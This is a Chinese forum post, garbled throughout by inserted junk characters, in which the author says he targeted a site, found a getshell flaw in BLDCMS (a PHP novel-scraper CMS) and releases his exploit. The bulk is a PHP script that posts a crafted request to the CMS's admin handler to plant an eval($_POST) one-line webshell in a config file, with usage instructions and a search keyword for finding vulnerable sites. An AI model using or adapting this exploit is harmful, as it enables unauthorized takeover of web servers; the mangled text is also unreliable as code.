之前想搞一个黑阔站，发现旁站有一个站用了 BLDCMS，我就下载看了，找到了一个 getshell 漏洞。
+ {4 f( A( w1 r+ w# u0 s4 |
" ?# I; \, z5 r; n7 s4 B/ t
话说昨晚晴天小铸在 90sec 发现有人把这个 getshell 漏洞的分析发出来了，擦，居然被人先发了。
既然都有人发了，我就把我之前写好的 EXP 放出来吧。
+ L. a) o* W, l% M2 t- ^! x0 q ' v2 v9 @8 h# T9 p/ l4 M% Z
02.<!--?php
5 \! v# M8 |- y" i+ `, |7 I03.echo "-------------------------------------------------------------------
3 |! e% @! L& k; I/ s1 B2 |04. & D5 [9 C1 Q( G& P
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
7 A. t6 a. |! }8 t c( b, u" N" Q06. 2 @7 c$ J9 b5 D+ {/ p( m% d% P
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun! Y" M/ {, y6 F3 t
08. 7 S; d4 J( g/ Y0 v
09.QQ:981009941\r\n 2013.3.21\r\n
0 }& A% i8 B. h10. $ W; R8 G6 U) _5 n! Y" b
11. ' s7 m& o/ {3 d5 U9 Z
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
" _2 {4 i" A+ m7 n& U5 J' \13.
$ F) y8 `: r9 z5 m14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------, Y. a( G( r1 v" R$ M) L) h% L. I
15.
: j) |- N1 w6 f9 g- _16.--------------------------------------------------------------------\r\n";0 J6 T0 {& b& }" O
17.$url=$argv[1];- M* O( H f5 M) o% S$ L+ E
18.$dir=$argv[2];9 X0 }; P; R/ r* }# y! h$ z
19.$pass=$argv[3];' k2 c+ n3 j) Y: B: \% V/ D
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
; T+ `4 q0 @2 F+ `! N: O1 S2 o21.if (emptyempty($pass)||emptyempty($url))
" r0 I) Q' l0 g/ T8 ^9 Y6 ~22.{exit("请输入参数");}
, h2 r% {1 }; e9 q! p1 V3 ~. r23.else
4 X# |9 |; ~. _24.{
# j* w+ O. i; H0 X! T) k$ X25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev$ Q" {9 a; f" s/ G+ H* v# ^ z
26. , Q5 b4 m* `/ G/ t! Q. o8 t a9 J
27.al;
/ o; {1 E! v( H% s- ^; A0 x& H# F; s3 ^: I28.$length = strlen($fuckdata);# m) m+ c' Z/ O( f6 z8 i: Y1 `% S
29.function getshell($url,$pass)% X" Q) }) d! |- t5 w4 I
30.{
8 I9 |- b) e/ }" o31.global $url,$dir,$pass,$eval,$length,$fuckdata;
: v9 q4 J; X8 e) e- t6 h( n32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";2 v+ J8 n( |0 C7 {6 ]" R' K
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
3 n9 X- Y# s" q$ [: j2 m, ]34.$header .= "User-Agent: MSIE\r\n";! m: x, {9 O% y9 x! W+ Y1 X% d
35.$header .= "Host:".$url."\r\n";
+ @$ B0 ~0 V$ ?$ D( M% {' f3 c36.$header .= "Content-Length: ".$length."\r\n";- E0 n% |2 K i7 a: I# d4 u
37.$header .= "Connection: Close\r\n";
3 R5 r0 z' G- p38.$header .="\r\n";7 |+ v p5 `/ t4 q7 t
39.$header .= $fuckdata."\r\n\r\n";
" q) W5 r1 w2 O; I8 M5 U40.$fp = fsockopen($url, 80,$errno,$errstr,15);
* R8 C1 z4 s! y: D+ o9 F41.if (!$fp)( s; E: J2 S/ O1 K3 v% _* S0 q; q2 R. Z
42.{6 C* Z( U. p0 S
43.exit ("利用失败:请检查指定目标是否能正常打开");
8 b( x) P5 N. c; M* O44.}
# n3 u! Y" c/ c* J7 ~) n0 V45.else{ if (!fputs($fp,$header))9 d& _4 S" z3 `1 G+ O1 f) l4 v, }
46.{exit ("利用失败");}) [4 c1 ?7 {! b, e+ c7 q
47.else
0 } n+ L" h% m, W1 O( h48.{+ ^. L5 K. a. Z4 G
49.$receive = '';, ]+ T: d/ d' \) x' ~
50.while (!feof($fp)) {
' v( L8 Q( V3 K, j3 B$ l' p3 X F51.$receive .= @fgets($fp, 1000);
4 M2 g* {( M! j$ k+ D( ]52.}
. U" \3 _8 H9 `( @53.@fclose($fp);
- t$ R8 m' |9 t$ G5 y! ?! z2 `54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标1 l2 V& E+ [# J7 e
55.
* B8 z- b8 T5 C& p( a7 u56.GPC是否=off)";# R1 O8 x* Z5 D! Y+ `+ [
57.}}
1 `, r9 }6 ]9 c58.}! x8 U& I( r; R% F
59.}
0 _% p% ~) p) }8 w3 K1 B60.getshell($url,$pass);
- D1 ?" I3 G2 R% R3 {8 B1 l61.?-->0 d0 j/ ]- O; j" ?4 y$ i! d1 \
2 z7 {9 x! F3 G6 J7 \
. P$ w B1 y. u7 n; S
by 数据流
|